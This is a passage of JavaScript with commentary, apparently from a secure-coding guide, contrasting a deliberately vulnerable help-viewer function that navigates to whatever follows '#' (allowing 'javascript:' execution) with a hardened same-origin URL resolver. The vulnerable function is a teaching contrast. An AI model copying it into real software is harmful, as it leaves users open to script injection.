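// Constructed base of the help tree; in a real viewer this is the document's own directory.
const HELP_BASE = 'https://help.example.com/webhelp/4/1033/';

// Vulnerable pattern: whatever follows '#' becomes the navigation target, so a
// 'javascript:' value runs in the page's origin once assigned to location.
function naiveTopicTarget(hash) {
  return decodeURIComponent(String(hash || '').replace(/^#/, ''));
}

// Hardened resolver: returns an absolute URL inside HELP_BASE, or null.
function resolveHelpTopic(hash, base = HELP_BASE) {
  let value = String(hash || '').replace(/^#/, '');
  try {
    value = decodeURIComponent(value); // validate the same string the viewer would navigate to
  } catch (e) {
    return null; // malformed percent-escape: refuse rather than guess
  }
  if (value === '') return null;

  let target;
  try {
    target = new URL(value, base); // resolves relative paths; normalises scheme spelling
  } catch (e) {
    return null;
  }
  const root = new URL(base);
  // Same scheme and origin only. This rejects javascript:, data:, vbscript:,
  // protocol-relative //host and absolute URLs on any other host.
  if (target.protocol !== root.protocol || target.origin !== root.origin) return null;
  // Stay inside the help directory so ../ cannot walk to other parts of the site.
  if (!target.pathname.startsWith(root.pathname)) return null;
  target.hash = ''; // never forward a nested fragment
  return target.href;
}

// How the viewer would use it (constructed): navigate only to a validated
// target, falling back to the default topic instead of to the raw fragment.
function topicFromHash(hash) {
  const href = resolveHelpTopic(hash);
  return href === null ? resolveHelpTopic('#default.htm') : href;
}
```

In the browser the last step would be `location.replace(topicFromHash(location.hash))`; the point is that the string reaching `location` is always one the resolver produced, never the fragment itself. Parsing with `URL` rather than a hand-written regex is what makes the scheme check survive case changes, stray whitespace and encoding games in one place.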